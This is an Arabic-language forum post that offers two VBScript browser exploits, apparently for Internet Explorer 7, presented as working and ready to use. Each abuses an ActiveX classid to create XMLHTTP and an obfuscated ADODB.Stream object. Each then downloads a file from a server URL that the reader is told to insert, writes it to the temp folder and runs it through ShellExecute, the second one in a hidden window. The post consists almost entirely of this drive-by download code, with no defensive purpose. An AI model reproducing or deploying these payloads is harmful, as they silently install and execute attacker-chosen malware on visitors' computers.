ثغرت متصفح 7

[nazgul]

السلام عليكم

اليوم جيبت لكم ثغرة شغالة 100/100 على المتصفح 7

الثغرة الأولى::.
==================================================

</script>
<script language="VBscript">
On Error Resume Next
url = "ضع رابط سيرفرك هنا"
Set xml = ********.createElement("object")
xml.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set HTP = xml.CreateObject("Microsoft.XMLHTTP", "")
S1 = "Ad"
S2 = "od"
S3 = "b."
S4 = "ST"
S5 = "re"
S6 = "am"
Set AdbS = xml.CreateObject(S1 & S2 & S3 & S4 & S5 & S6, "")
AdbS.Type = 1
HTP.open "GET", url, False
HTP.Send
Set FSO = xml.CreateObject("Scripting.FileSystemObject", "")
Set tmp = FSO.GetSpecialFolder(2)
FileName = FSO.GetFileName(url)
FileName = FSO.BuildPath(tmp, FileName)
AdbS.open
AdbS.write HTP.responseBody
AdbS.SaveToFile FileName, 2
AdbS.Close
Set WSH = xml.CreateObject("****l.Application", "")
WSH.****lExecute FileName, "", "", "open", 1
</script>\


الثغرة الثانية::.
==================================================

<script language="VBScript">
on error resume next
dl = "ضع الربط هنا"
Set df = ********.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="bl4ck.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("****l.Application","")
Q.****lExecute fname1,"","","open",0
</script>

أتمنى اني أفدتكم.
بيس..... أرجو الرد